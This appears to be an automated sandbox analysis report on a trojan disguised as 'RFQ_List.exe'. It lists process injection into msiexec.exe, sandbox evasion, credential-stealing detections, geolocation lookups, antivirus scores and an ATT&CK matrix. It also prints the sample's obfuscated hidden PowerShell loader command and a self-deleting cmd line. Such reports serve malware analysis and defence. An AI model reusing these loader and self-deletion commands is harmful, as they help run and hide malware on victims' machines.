        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599866Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599745Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599610Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599485Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599360Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599235Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599110Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598997Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598766Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598641Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598532Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598407Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598282Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597938Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597813Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597688Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597453Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596782Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596657Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596532Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596407Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596297Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596188Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596063Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595938Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595579Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595454Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595329Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595216Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
        Source: msiexec.exe, 00000006.00000002.2667333235.0000000009418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: msiexec.exe, 00000006.00000002.2679666191.0000000027303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
        Source: C:\Users\user\Desktop\RFQ_List.exeAPI call chain: ExitProcess graph end nodegraph_0-2837
        Source: C:\Users\user\Desktop\RFQ_List.exeAPI call chain: ExitProcess graph end nodegraph_0-3017
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0480D8B8 LdrInitializeThunk,1_2_0480D8B8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$noncuriousness=get-content -raw 'c:\users\user\appdata\local\peritonealizing\nomadeinvasioners\stofhandskernes\maidenliness.hal37';$objektiviserende=$noncuriousness.substring(53938,3);.$objektiviserende($noncuriousness)"
        Source: C:\Users\user\Desktop\RFQ_List.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$noncuriousness=get-content -raw 'c:\users\user\appdata\local\peritonealizing\nomadeinvasioners\stofhandskernes\maidenliness.hal37';$objektiviserende=$noncuriousness.substring(53938,3);.$objektiviserende($noncuriousness)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5788, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5788, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        OS Credential Dumping11
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Command and Scripting Interpreter
        Boot or Logon Initialization Scripts311
        Process Injection
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop Protocol1
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell
        Logon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information
        LSA Secrets1
        System Network Configuration Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing
        Cached Domain Credentials4
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSync14
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543566 Sample: RFQ_List.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 checkip.dyndns.org 2->37 39 3 other IPs or domains 2->39 47 Found malware configuration 2->47 49 Antivirus detection for dropped file 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 55 6 other signatures 2->55 10 RFQ_List.exe 3 37 2->10         started        signatures3 53 Tries to detect the country of the analysis system (by using the IP) 35->53 process4 file5 29 C:\Users\user\AppData\...\Maidenliness.Hal37, ASCII 10->29 dropped 57 Suspicious powershell command line found 10->57 14 powershell.exe 27 10->14         started        signatures6 process7 file8 31 C:\Users\user\AppData\Local\...\RFQ_List.exe, PE32 14->31 dropped 33 C:\Users\...\RFQ_List.exe:Zone.Identifier, ASCII 14->33 dropped 59 Early bird code injection technique detected 14->59 61 Writes to foreign memory regions 14->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 14->63 65 3 other signatures 14->65 18 msiexec.exe 15 10 14->18         started        21 conhost.exe 14->21         started        signatures9 process10 dnsIp11 41 reallyfreegeoip.org 188.114.97.3, 443, 51954, 51960 CLOUDFLARENETUS European Union 18->41 43 checkip.dyndns.com 158.101.44.242, 51943, 51966, 51973 ORACLE-BMC-31898US United States 18->43 45 2 other IPs or domains 18->45 23 cmd.exe 1 18->23         started        process12 process13 25 conhost.exe 23->25         started        27 choice.exe 1 23->27         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        RFQ_List.exe67%ReversingLabsWin32.Trojan.Generic
        RFQ_List.exe36%VirustotalBrowse
        RFQ_List.exe100%AviraHEUR/AGEN.1333748
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe100%AviraHEUR/AGEN.1333748
        C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe67%ReversingLabsWin32.Trojan.Generic
        No Antivirus matches
        SourceDetectionScannerLabelLink
        drive.google.com0%VirustotalBrowse
        drive.usercontent.google.com1%VirustotalBrowse
        reallyfreegeoip.org0%VirustotalBrowse
        checkip.dyndns.com0%VirustotalBrowse
        checkip.dyndns.org1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://checkip.dyndns.org/0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://aka.ms/pscore6lB0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        http://reallyfreegeoip.org0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://reallyfreegeoip.org0%URL Reputationsafe
        http://checkip.dyndns.org0%URL Reputationsafe
        http://checkip.dyndns.org0%URL Reputationsafe
        https://apis.google.com0%URL Reputationsafe
        http://checkip.dyndns.com0%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://reallyfreegeoip.org/xml/0%URL Reputationsafe
        https://drive.google.com/1%VirustotalBrowse
        https://www.google.com0%VirustotalBrowse
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        142.250.185.206
        truefalseunknown
        drive.usercontent.google.com
        172.217.16.193
        truefalseunknown
        reallyfreegeoip.org
        188.114.97.3
        truetrueunknown
        checkip.dyndns.com
        158.101.44.242
        truefalseunknown
        checkip.dyndns.org
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        http://checkip.dyndns.org/false
        • URL Reputation: safe
        unknown
        https://reallyfreegeoip.org/xml/155.94.241.188false
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.commsiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://drive.google.com/msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://contoso.com/powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002519E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://apis.google.commsiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://checkip.dyndns.commsiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorRFQ_List.exe, RFQ_List.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://reallyfreegeoip.org/xml/155.94.241.188$msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
